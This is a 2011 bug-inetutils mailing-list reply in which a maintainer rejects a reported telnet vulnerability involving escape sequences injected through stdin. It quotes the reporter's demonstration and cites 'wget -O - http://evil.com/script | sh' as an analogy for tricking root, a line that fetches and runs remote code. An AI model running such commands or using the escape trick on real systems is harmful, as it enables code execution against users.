[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [bug-inetutils] telnet security advisory
|
From: |
Simon Josefsson |
|
Subject: |
Re: [bug-inetutils] telnet security advisory |
|
Date: |
Mon, 03 Oct 2011 01:16:31 +0200 |
|
User-agent: |
Gnus/5.110018 (No Gnus v0.18) Emacs/23.2 (gnu/linux) |
sha0 <address@hidden> writes:
> Hello,
>
> Is posible to inject a scape sequence via stdin to telnet, and arbitrary
> comands will be executed,
Hi! Thanks for studying InetUtils for security problems. I'm not sure
I follow your "attack" though.
> for example:
>
>
> # cat evil-file | telnet 127.0.0.1 80
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
>
> telnet> !id
> uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1
> 0(wheel),19(log)
> Connection closed by foreign host.
>
>
> I think is very dangerous despite of few admins use telnet for moving file
> like this
Yes it is dangerous, so don't do that. Use ftp to transfer files.
> 3. DESCRIPTION
> -------------------------
> When telnet is used to transfer files to remote tcp port, a very dangerous
> vulnerability is present, that lets a remote arbitrary code execution.
The attack seems to be based on tricking the local root user into doing
something stupid. This is similar to asking the local root user to do
'wget -O - http://evil.com/script | sh'. There is no security bug in
wget or sh just because that is possible.
> 7. SOLUTION
> -------------------------
> The stdin parser must filter the 0x9d byte.
The ^] escape sequence is a documented feature, so I don't think that is
a solution.
You can use the command line parameter -E to inhibit the escape
character if you want. Quoting 'telnet --help':
-E, --no-escape use no escape character
/Simon
- Re: [bug-inetutils] telnet security advisory,
Simon Josefsson <=